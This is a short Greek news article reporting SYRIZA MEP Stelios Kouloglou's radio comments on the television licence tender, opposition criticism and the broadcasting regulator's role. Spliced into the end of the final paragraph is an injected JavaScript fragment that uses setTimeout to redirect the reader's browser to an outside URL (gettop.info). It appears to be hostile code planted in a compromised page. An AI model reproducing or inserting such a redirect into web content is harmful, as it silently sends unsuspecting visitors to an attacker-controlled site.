Κούλογλου για άδειες: Γίνεται προσπάθεια να μπει τάξη στη… ζούγκλα

0
7

 

O ευρωβουλευτής του ΣΥΡΙΖΑ Στέλιος Κούλογλου παρενέβη για τη διαδικασία των τηλεοπτικών αδειών λέγοντας πως «όλα αυτά που συμβαίνουν μας δίνουν την ευκαιρία να αναλογιστούμε τι έχει συμβεί στη χώρα τις προηγούμενες δεκαετίες και γιατί η χώρα έφτασε ως εδώ. Ότι είχαμε φτάσει σ’ ένα καθεστώς ζούγκλας και ανομίας, για το οποίο γίνεται προσπάθεια να μπει σε τάξη. Βεβαίως αυτή η διαδικασία είναι πολύ ξεχωριστή και έχει πάρει αυτά τα χαρακτηριστικά γιατί πάει να λύσει μια ανώμαλη κατάσταση και όχι μια συνηθισμένη όπως συμβαίνει στις δημοκρατίες» είπε ο ευρωβουλευτής του ΣΥΡΙΖΑ.

Μιλώντας στον ραδιοφωνικό σταθμό στο Κόκκινο, ο ευρωβουλευτής του ΣΥΡΙΖΑ είπε επίσης ότι «το γεγονός που προκαλεί μεγάλη εντύπωση είναι ότι από την πλευρά της αντιπολίτευσης όλο αυτό τον καιρό δεν έχει ακουστεί ούτε μία κουβέντα αυτοκριτικής για την κατάσταση που επικρατούσε τα προηγούμενα τριάντα χρόνια, όπου ο καθένας έκανε ό,τι ήθελε, κανείς δεν πλήρωνε για τη χρήση δημοσίων αγαθών και δεν έδινε πουθενά λογαριασμό. Αυτό δείχνει ότι η αντιπολίτευση θέλει να έρθει στην εξουσία για να επαναφέρει το παλιό καθεστώς που έφερε τη χώρα στο σημείο αυτό».

«Φυσικά μετά τον διαγωνισμό χρειάζεται εμείς ως δημοσιογράφοι να συζητήσουμε σοβαρά και για την ποιότητα της ενημέρωσης που θέλουμε και να κοιτάξουμε να υπάρξουν ρυθμιστικοί κανόνες που να εξασφαλίζουν την προστασία των πολιτών από μεγάλα, ίσως και σκοτεινά, οικονομικά συμφέροντα, εάν αυτά κερδίσουν το διαγωνισμό για τις άδειες. Εδώ το ΕΣΡ καλείται να παίξει έναν πάρα πολύ σημαντικό ρόλο. Κι εδώ έχουμε πάλι την αντιπολίτευση να ματαιώνει τη διαδικασία αυτή και τη λειτουργία μιας ανεξάρτητης αρχής που είναι τελείως απαραίτητη έτσι ώστε στο καινούργιο αυτό τοπίο να μπουν αυστηροί κανόνες οι οποίοι να εξασφαλίζουν την οικονομική διαφάνεια, τον πλουραλισμό και την ενημέρωση των πολιτών» κατέληξε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here